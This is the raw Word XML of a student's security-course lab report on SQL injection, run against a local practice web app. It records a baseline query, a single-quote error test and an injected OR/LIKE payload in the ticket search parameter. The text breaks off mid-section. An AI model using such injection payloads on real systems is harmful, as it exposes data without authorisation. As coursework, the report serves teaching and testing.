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kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-1612038203"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="2A3916CF" w14:textId="1215233E" w:rsidR="00E12E7D" w:rsidRDefault="00E12E7D" w:rsidP="008F3828">
          <w:pPr>
            <w:pStyle w:val="NoSpacing"/>
            <w:spacing w:before="1540" w:after="240"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:color w:val="156082" w:themeColor="accent1"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:color w:val="156082" w:themeColor="accent1"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FCE1C77" wp14:editId="7126C50A">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le"/>
            <w:tag w:val=""/>
            <w:id w:val="1735040861"/>
            <w:placeholder>
              <w:docPart w:val="95FE4D41D9F9411BBB1FDF543C2707DC"/>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6B2CC55C" w14:textId="5226187A" w:rsidR="00E12E7D" w:rsidRDefault="00E12E7D" w:rsidP="008F3828">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Lab 1 – SQL Injection</w:t>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:color w:val="156082" w:themeColor="accent1"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:alias w:val="Subtitle"/>
            <w:tag w:val=""/>
            <w:id w:val="328029620"/>
            <w:placeholder>
              <w:docPart w:val="51EEF364E0EC4FDCA605D0360F349136"/>
            </w:placeholder>
            <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
            <w:text/>
          </w:sdtPr>
          <w:sdtContent>
            <w:p w14:paraId="2F9C432C" w14:textId="1CC8781E" w:rsidR="00E12E7D" w:rsidRDefault="00E12E7D" w:rsidP="008F3828">
              <w:pPr>
                <w:pStyle w:val="NoSpacing"/>
                <w:jc w:val="center"/>
                <w:rPr>
                  <w:color w:val="156082" w:themeColor="accent1"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="28"/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:color w:val="156082" w:themeColor="accent1"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="28"/>
                </w:rPr>
                <w:t>EECE503M: Software &amp; AI Security</w:t>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
        <w:p w14:paraId="18C9C66E" w14:textId="77777777" w:rsidR="00E12E7D" w:rsidRDefault="00E12E7D" w:rsidP="008F3828">
          <w:pPr>
            <w:pStyle w:val="NoSpacing"/>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7761F93B" wp14:editId="04A33C28">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9-27T00:00:00Z">
                                    <w:dateFormat w:val="MMMM d, yyyy"/>
                                    <w:lid w:val="en-US"/>
                                    <w:storeMappedDataAs w:val="dateTime"/>
                                    <w:calendar w:val="gregorian"/>
                                  </w:date>
                                </w:sdtPr>
                                <w:sdtContent>
                                  <w:p w14:paraId="7FB17989" w14:textId="55944F56" w:rsidR="00E12E7D" w:rsidRPr="00E12E7D" w:rsidRDefault="00E12E7D" w:rsidP="00E12E7D">
                                    <w:pPr>
                                      <w:pStyle w:val="NoSpacing"/>
                                      <w:spacing w:after="40"/>
                                      <w:jc w:val="center"/>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="156082" w:themeColor="accent1"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r w:rsidRPr="00E12E7D">
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="156082" w:themeColor="accent1"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                      <w:t>September 27, 2026</w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                              <w:p w14:paraId="569073AE" w14:textId="750BBBBB" w:rsidR="00E12E7D" w:rsidRDefault="00000000">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:jc w:val="center"/>
                                  <w:rPr>
                                    <w:color w:val="156082" w:themeColor="accent1"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:sdt>
                                  <w:sdtPr>
                                    <w:rPr>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00E12E7D">
                                      <w:rPr>
                                        <w:color w:val="156082" w:themeColor="accent1"/>
                                      </w:rPr>
                                      <w:t>Ziad Abillama</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                              </w:p>
                              <w:p w14:paraId="45960935" w14:textId="051310E5" w:rsidR="00D358C4" w:rsidRDefault="00D358C4">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:jc w:val="center"/>
                                  <w:rPr>
                                    <w:color w:val="156082" w:themeColor="accent1"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r w:rsidRPr="00D358C4">
                                  <w:rPr>
                                    <w:color w:val="156082" w:themeColor="accent1"/>
                                  </w:rPr>
                                  <w:t>https://github.com/ZiadAbillama/EECE503M-Lab</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7761F93B"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9-27T00:00:00Z">
                              <w:dateFormat w:val="MMMM d, yyyy"/>
                              <w:lid w:val="en-US"/>
                              <w:storeMappedDataAs w:val="dateTime"/>
                              <w:calendar w:val="gregorian"/>
                            </w:date>
                          </w:sdtPr>
                          <w:sdtContent>
                            <w:p w14:paraId="7FB17989" w14:textId="55944F56" w:rsidR="00E12E7D" w:rsidRPr="00E12E7D" w:rsidRDefault="00E12E7D" w:rsidP="00E12E7D">
                              <w:pPr>
                                <w:pStyle w:val="NoSpacing"/>
                                <w:spacing w:after="40"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="156082" w:themeColor="accent1"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00E12E7D">
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="156082" w:themeColor="accent1"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>September 27, 2026</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                        <w:p w14:paraId="569073AE" w14:textId="750BBBBB" w:rsidR="00E12E7D" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:color w:val="156082" w:themeColor="accent1"/>
                            </w:rPr>
                          </w:pPr>
                          <w:sdt>
                            <w:sdtPr>
                              <w:rPr>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00E12E7D">
                                <w:rPr>
                                  <w:color w:val="156082" w:themeColor="accent1"/>
                                </w:rPr>
                                <w:t>Ziad Abillama</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                        <w:p w14:paraId="45960935" w14:textId="051310E5" w:rsidR="00D358C4" w:rsidRDefault="00D358C4">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:color w:val="156082" w:themeColor="accent1"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00D358C4">
                            <w:rPr>
                              <w:color w:val="156082" w:themeColor="accent1"/>
                            </w:rPr>
                            <w:t>https://github.com/ZiadAbillama/EECE503M-Lab</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap anchorx="margin" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:color w:val="156082" w:themeColor="accent1"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0547776B" wp14:editId="21BCEFC8">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2EA6A843" w14:textId="4F91075D" w:rsidR="00E12E7D" w:rsidRDefault="00E12E7D" w:rsidP="001B6D66">
          <w:pPr>
            <w:jc w:val="both"/>
          </w:pPr>
          <w:r>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="77ED5004" w14:textId="4F146F5C" w:rsidR="00FE46D2" w:rsidRDefault="00E12E7D" w:rsidP="001B6D66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Objective 1</w:t>
      </w:r>
      <w:r w:rsidR="005F5660">
        <w:t>: Identify an SQL-</w:t>
      </w:r>
      <w:r w:rsidR="004A4D58">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="005F5660">
        <w:t xml:space="preserve">njection </w:t>
      </w:r>
      <w:r w:rsidR="004A4D58">
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="005F5660">
        <w:t>ulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668A5015" w14:textId="1CF8EF56" w:rsidR="00E12E7D" w:rsidRDefault="005F5660" w:rsidP="001B6D66">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r w:rsidR="00E12E7D">
        <w:t>Target</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E12E7D" w14:paraId="66D294C1" w14:textId="77777777" w:rsidTr="005F5660">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0E6C2BA2" w14:textId="4D576DFF" w:rsidR="00E12E7D" w:rsidRPr="00E12E7D" w:rsidRDefault="00E12E7D" w:rsidP="001B6D66">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00E12E7D">
              <w:t>http://127.0.0.1:5001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2712D70C" w14:textId="3C4511DA" w:rsidR="00E12E7D" w:rsidRDefault="005F5660" w:rsidP="001B6D66">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r w:rsidR="00E12E7D">
        <w:t>Vulnerable Parameter</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E12E7D" w14:paraId="782A60E5" w14:textId="77777777" w:rsidTr="005F5660">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="19DE1723" w14:textId="7AA1D45A" w:rsidR="00E12E7D" w:rsidRPr="00E12E7D" w:rsidRDefault="00E12E7D" w:rsidP="001B6D66">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>q</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A4F57E5" w14:textId="5D991170" w:rsidR="00E12E7D" w:rsidRDefault="00E12E7D" w:rsidP="001B6D66">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerable parameter was identified in the staff ticket search feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4031B226" w14:textId="31A32E6C" w:rsidR="005F5660" w:rsidRDefault="005F5660" w:rsidP="001B6D66">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.3 Methodology and Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417FDF42" w14:textId="409A9954" w:rsidR="005F5660" w:rsidRDefault="005F5660" w:rsidP="001B6D66">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.1 Baseline / Control Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456C672A" w14:textId="782B0E19" w:rsidR="005F5660" w:rsidRDefault="005F5660" w:rsidP="001B6D66">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005F5660">
        <w:t>I submitted a random search term that should not match any ticket:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F5660" w14:paraId="3E965273" w14:textId="77777777" w:rsidTr="005F5660">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0411EBF9" w14:textId="5621A142" w:rsidR="005F5660" w:rsidRDefault="005F5660" w:rsidP="001B6D66">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="005F5660">
              <w:t>q=</w:t>
            </w:r>
            <w:r>
              <w:t>ziadtestticket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A0DBF48" w14:textId="3F53E800" w:rsidR="005F5660" w:rsidRDefault="005F5660" w:rsidP="001B6D66">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
      <w:r>
        <w:t>The application returned:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8D7913" w14:textId="65832A01" w:rsidR="005F5660" w:rsidRDefault="001B6D66" w:rsidP="001B6D66">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001B6D66">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73EF5681" wp14:editId="415F92FE">
            <wp:extent cx="6858000" cy="3923030"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1239042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042556" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3923030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08052573" w14:textId="541EBAE8" w:rsidR="005F5660" w:rsidRDefault="005F5660" w:rsidP="001B6D66">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003A58FB">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001B6D66">
        <w:t>3.1a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="001B6D66">
        <w:t xml:space="preserve"> Burp request showing the control value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA93D55" w14:textId="0B38A390" w:rsidR="005F5660" w:rsidRDefault="001B6D66" w:rsidP="001B6D66">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001B6D66">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16E77533" wp14:editId="56F33A10">
            <wp:extent cx="6858000" cy="2578735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1552568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568889" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2578735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="176B46FB" w14:textId="7D153BF3" w:rsidR="005F5660" w:rsidRDefault="005F5660" w:rsidP="001B6D66">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="001B6D66">
        <w:t>1.3.1b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Render </w:t>
      </w:r>
      <w:r w:rsidR="001B6D66">
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>esponse showing 0 matches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36634B37" w14:textId="61083B63" w:rsidR="005F5660" w:rsidRPr="005F5660" w:rsidRDefault="001B6D66" w:rsidP="001B6D66">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.2 Error-Based SQL Injection test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1E67EE" w14:textId="11AD780D" w:rsidR="005F5660" w:rsidRDefault="001B6D66" w:rsidP="001B6D66">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>I submitted a single quote as the search value:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B6D66" w14:paraId="31458A01" w14:textId="77777777" w:rsidTr="001B6D66">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="71E9CC0A" w14:textId="5C7A7767" w:rsidR="001B6D66" w:rsidRDefault="001B6D66" w:rsidP="001B6D66">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>q=’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16350372" w14:textId="780155F6" w:rsidR="001B6D66" w:rsidRDefault="001B6D66" w:rsidP="001B6D66">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The application returned a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>500 Internal Server Error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and exposed a Django/PostgreSQL error page. This indicates that the quote was incorporated into a backend SQL query without being safely escaped or parametrized. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B65BB1C" w14:textId="77777777" w:rsidR="001B6D66" w:rsidRDefault="001B6D66" w:rsidP="001B6D66">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001B6D66">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="000212E3" wp14:editId="4C7580D1">
            <wp:extent cx="6858000" cy="4062730"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="479206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206956" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="4062730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E47B3D4" w14:textId="49ED64FB" w:rsidR="001B6D66" w:rsidRDefault="001B6D66" w:rsidP="001B6D66">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 1.3.2: Burp request containing q=’ and response showing the 500 error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14082FFC" w14:textId="567EFC0A" w:rsidR="001B6D66" w:rsidRPr="001B6D66" w:rsidRDefault="001B6D66" w:rsidP="001B6D66">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.3.3 SQL Injection Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320F7EAC" w14:textId="7C7EEBC9" w:rsidR="00E12E7D" w:rsidRDefault="001B6D66" w:rsidP="001B6D66">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>I submitted the following payload:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B6D66" w14:paraId="3F511B72" w14:textId="77777777" w:rsidTr="001B6D66">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1B8E5B4B" w14:textId="7FFCBA9E" w:rsidR="001B6D66" w:rsidRDefault="001B6D66" w:rsidP="001B6D66">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="001B6D66">
              <w:t>q=zzzz</w:t>
            </w:r>
            <w:r w:rsidR="005F5467">
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="001B6D66">
              <w:t>OR</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="001B6D66">
              <w:t>title</w:t>
            </w:r>
            <w:r w:rsidR="005F5467">
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="001B6D66">
              <w:t>LIKE</w:t>
            </w:r>
            <w:r w:rsidR="005F5467">
              <w:t>+’</w:t>
            </w:r>
            <w:r w:rsidRPr="001B6D66">
              <w:t>%Attachment%</w:t>
            </w:r>
            <w:r w:rsidR="005F5467">
              <w:t>’</w:t>
            </w:r>
            <w:r w:rsidRPr="001B6D66">
              <w:t>--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="267C9988" w14:textId="02B52673" w:rsidR="001B6D66" w:rsidRDefault="001B6D66" w:rsidP="001B6D66">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The response returned ticket entries whose titles contained “Attachement.” The initial value, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>zzzz</w:t>
      </w:r>
      <w:r>
        <w:t>, is not expected to match tickets. The injected SQL condition:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B6D66" w14:paraId="638B5DCB" w14:textId="77777777" w:rsidTr="001B6D66">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5977C9F3" w14:textId="0661F434" w:rsidR="001B6D66" w:rsidRDefault="005F5467" w:rsidP="001B6D66">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="005F5467">
              <w:t>OR</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="005F5467">
              <w:t>title</w:t>
            </w:r>
            <w:r>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="005F5467">
              <w:t>LIKE</w:t>
            </w:r>
            <w:r>
              <w:t>+’</w:t>
            </w:r>
            <w:r w:rsidRPr="005F5467">
              <w:t>%Attachment%</w:t>
            </w:r>
            <w:r>
              <w:t>’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D37DE1C" w14:textId="50FE92CD" w:rsidR="001B6D66" w:rsidRDefault="005F5467" w:rsidP="001B6D66">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>caused the application to return tickets matching the attacker-supplied condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EFF2F9" w14:textId="54E27D8E" w:rsidR="005F5467" w:rsidRDefault="005F5467" w:rsidP="001B6D66">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The trailing SQL comment:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F5467" w14:paraId="5FFE8BB1" w14:textId="77777777" w:rsidTr="005F5467">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="12299324" w14:textId="7DE037F9" w:rsidR="005F5467" w:rsidRDefault="005F5467" w:rsidP="005F5467">
            <w:pPr>
